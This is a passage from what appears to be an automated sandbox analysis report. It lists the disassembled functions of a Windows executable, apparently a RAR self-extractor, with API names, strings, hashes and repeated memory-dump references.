                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81415C61A09B82C1EB15FB36D5543FAA765AB88BC0F884131DE4E077A9DF3CE405C324
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBBF0C0 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                              • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                                                              • API String ID: 3215553584-2617248754
                                                                                                                                                                                                              • Opcode ID: d0f6e0e755be6f81d642f5a4928110be519ccee4392f6ac5a24fef1ade4e8050
                                                                                                                                                                                                              • Instruction ID: b061dbbcbda168db849d58ac0d7f53cf08994758f2c7d629b4bab70c8f833523
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0f6e0e755be6f81d642f5a4928110be519ccee4392f6ac5a24fef1ade4e8050
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A41BB72A09B85C9E700EF75E8417EE73A4EB18798F884136EE8C07B94DE3CD4258354
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBAF440 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Item$Text
                                                                                                                                                                                                              • String ID: LICENSEDLG
                                                                                                                                                                                                              • API String ID: 1601838975-2177901306
                                                                                                                                                                                                              • Opcode ID: e0e813d694038819732ec324e5558a444dad7dee1083978382a202e348cc525b
                                                                                                                                                                                                              • Instruction ID: e0bd36761f4e49af6fd39c3671e0b8bb8720279219ac1b62da544898000242d3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0e813d694038819732ec324e5558a444dad7dee1083978382a202e348cc525b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF417D65A09692C2FB58BB22E8543F8A3A5AF89FC4F8C4035DD4D07B95CF3CE5428324
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB1B0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ButtonCheckedObject$ClassDeleteLongName
                                                                                                                                                                                                              • String ID: STATIC
                                                                                                                                                                                                              • API String ID: 781704138-1882779555
                                                                                                                                                                                                              • Opcode ID: dc86dc3c53170f4d5698ad76ced0c7edefbbafb42d4d4dd989580a58c0d7cc96
                                                                                                                                                                                                              • Instruction ID: 887d1c9fd0e027d15a15687b5832d57ddd6a52a46979c24a4911144b7b3b20c4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc86dc3c53170f4d5698ad76ced0c7edefbbafb42d4d4dd989580a58c0d7cc96
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2319265B0978287EB10BB22A5586FDE395EB89BC0F984030DD8D47B55DE3DE8428760
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB1C4C Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 174COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ShowWindow$CloseCodeExitHandleProcess
                                                                                                                                                                                                              • String ID: .exe$.inf$Install$p
                                                                                                                                                                                                              • API String ID: 235082525-3607691742
                                                                                                                                                                                                              • Opcode ID: adc50215b8679669ca15db43a899b88b24b5617d1cab28a4d91fed0c8054fb67
                                                                                                                                                                                                              • Instruction ID: 85c8b475df385cb8bd2345b603e76796b3064921c32f1167896a81492c6c7acd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: adc50215b8679669ca15db43a899b88b24b5617d1cab28a4d91fed0c8054fb67
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90715E61B09683D6EB64AB31E8502F9B3A4EF84784FDC4135DA4E436A4DF3DE941C724
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBA0BCC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                                                                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                                                              • API String ID: 2915667086-2207617598
                                                                                                                                                                                                              • Opcode ID: 67976fa20c078f1fa4cd085f8d12fa31ca02224fdc21a952c759dedfb78ddc85
                                                                                                                                                                                                              • Instruction ID: 2e5f1ad3650f436a995d3811cfa00c2ecc5b4acc92d03c3139d67898cc35ba2c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67976fa20c078f1fa4cd085f8d12fa31ca02224fdc21a952c759dedfb78ddc85
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F310B20E0AB87C4EA15AB35AC402B6B7A0BF58B90F9C5139C99D077A5EE3CE545C324
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB924A8 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 410COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                                              • String ID: ;%u$x%u$xc%u
                                                                                                                                                                                                              • API String ID: 233258989-2277559157
                                                                                                                                                                                                              • Opcode ID: a63eb6064becaf551ee9b62623661f26d4beeaa20fe838dd2f8d40139cf0e1d3
                                                                                                                                                                                                              • Instruction ID: ed2ff73ce9a4c4daa9017449e0b0bd42d7426a4b2c22d527a4271dc56d7f56c0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a63eb6064becaf551ee9b62623661f26d4beeaa20fe838dd2f8d40139cf0e1d3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1802AD22F0C2C2C1FE28BA3297563FEE791AF55780F884035DA8E47686DE6DE545C321
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB63BC Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                              • API String ID: 2940173790-393685449
                                                                                                                                                                                                              • Opcode ID: 656fa11f87a5835f4a8d5b9d8c1c214d7a371b9261438cca58653dffd1aead5d
                                                                                                                                                                                                              • Instruction ID: 98400aeb651413d0bcbabd3cf21fb3c9530031d68d0482d6b685fc98f942d282
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 656fa11f87a5835f4a8d5b9d8c1c214d7a371b9261438cca58653dffd1aead5d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9E1A072A086C2CBE721AF35D8842EDB7A1FB45748F980136DA8D47699CF38E981C715
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9A364 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 127fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileMoveNamePath$CompareLongShortStringswprintf
                                                                                                                                                                                                              • String ID: rtmp%d
                                                                                                                                                                                                              • API String ID: 2308737092-3303766350
                                                                                                                                                                                                              • Opcode ID: 8ddca6d37f97333df73e724e0fd53a187de6789ea24f91e5f34e9e4509da98fe
                                                                                                                                                                                                              • Instruction ID: afde2b81f15f34b9241b6c39ce3e576dff1bffe20dc54ef6d17cdaf8fe330c86
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ddca6d37f97333df73e724e0fd53a187de6789ea24f91e5f34e9e4509da98fe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC515A62B185C2D5EA30BB31D9451FEA3A8BF85BC4FC94031D94D5BA9ADE3CE605C360
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBAD9D8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Show$ItemRectText
                                                                                                                                                                                                              • String ID: RarHtmlClassName
                                                                                                                                                                                                              • API String ID: 2921387401-1658105358
                                                                                                                                                                                                              • Opcode ID: 2c71e3d9204bf68c8187079716c1d8d07857564370bdb57e2ca0224828b4a0b7
                                                                                                                                                                                                              • Instruction ID: f2d214164bdddb78a4e2cf91122d69320f9d2f873f4962e5b2eb8ade2c243e02
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c71e3d9204bf68c8187079716c1d8d07857564370bdb57e2ca0224828b4a0b7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5416E75609B82C6EB55AF21E4443AEF7A5EB88B80F984135DE8E43B58DF3CE4018714
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB3190 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(?,?,?,00007FF75FBB30FF,?,?,?,00007FF75FBB34BA), ref: 00007FF75FBB31B7
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF75FBB30FF,?,?,?,00007FF75FBB34BA), ref: 00007FF75FBB31D4
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF75FBB30FF,?,?,?,00007FF75FBB34BA), ref: 00007FF75FBB31F0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                                                              • API String ID: 667068680-1718035505
                                                                                                                                                                                                              • Opcode ID: cfcd013ac6127581a6f5b2aa79448a2dfb50b0855d7a86bca1cccd10ee5e69d8
                                                                                                                                                                                                              • Instruction ID: 00045116833e8e851526315764a7b63dfa7607f1ea749f61fe83856cefbbdc1e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cfcd013ac6127581a6f5b2aa79448a2dfb50b0855d7a86bca1cccd10ee5e69d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6110964E9AB83C6EE51BF31A9506F6D2A56F08B80FCC5635C90E06350EE7CE8958264
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBA2F54 Relevance: 9.1, APIs: 6, Instructions: 113timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00007FF75FB9C108: GetVersionExW.KERNEL32 ref: 00007FF75FB9C127
                                                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF75FB91DE7), ref: 00007FF75FBA2FA6
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF75FB91DE7), ref: 00007FF75FBA2FB2
                                                                                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF75FB91DE7), ref: 00007FF75FBA2FC2
                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF75FB91DE7), ref: 00007FF75FBA2FD0
                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF75FB91DE7), ref: 00007FF75FBA2FDE
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF75FB91DE7), ref: 00007FF75FBA301F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2092733347-0
                                                                                                                                                                                                              • Opcode ID: 0d8760d0cab82c483e4f6e13a65653f35ae0e4cb21dc7b303c03e9ba6031343a
                                                                                                                                                                                                              • Instruction ID: 45d3e9176f957cfeb76e8dbb8614b1e6bbebe93a4570bcd3e870b797a92f3b4b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d8760d0cab82c483e4f6e13a65653f35ae0e4cb21dc7b303c03e9ba6031343a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A44189B2A10692CBDB24DF38D8441ECB7B1F748B887984136EA4D87B58DF38D955C710
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBAD388 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
